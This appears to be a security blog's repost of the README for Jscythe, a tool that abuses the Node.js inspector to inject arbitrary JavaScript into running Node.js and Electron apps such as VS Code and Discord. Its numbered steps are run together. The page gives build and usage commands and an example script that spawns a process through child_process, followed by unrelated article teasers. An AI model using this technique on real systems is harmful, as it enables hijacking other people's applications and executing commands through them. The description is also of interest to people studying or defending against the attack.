Jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.
Tested and working against Visual Studio Code, Discord, any Node.js application and more!
SIGUSR1 signal to the process, this will enable the debugger on a port (depending on the software, sometimes it’s random, sometimes it’s not).SIGUSR1.http://localhost:<port>/json.Runtime.evaluate request with the provided code.cargo build --release
Target a specific process and execute a basic expression:
./target/debug/jscythe --pid 666 --code "5 - 3 + 2"
Execute code from a file:
./target/debug/jscythe --pid 666 --script example_script.js
The example_script.js can require any node module and execute any code, like:
require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout Search process by expression:
./target/debug/jscythe --search extensionHost --script example_script.js
Run jscythe --help for the complete list of options.
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Linux is renowned for its versatility, open-source nature, and security. Whether you're a beginner, developer,…
Cyber insurance helps businesses and individuals mitigate financial losses from data breaches, ransomware, extortion, legal…
Ransomware is one of the most dangerous and destructive forms of cybercrime today. With cybercriminals…
Social media is a key part of our daily lives, with millions of users sharing…
What Are Data Brokers? Data brokers are companies that collect, aggregate, and sell personal information,…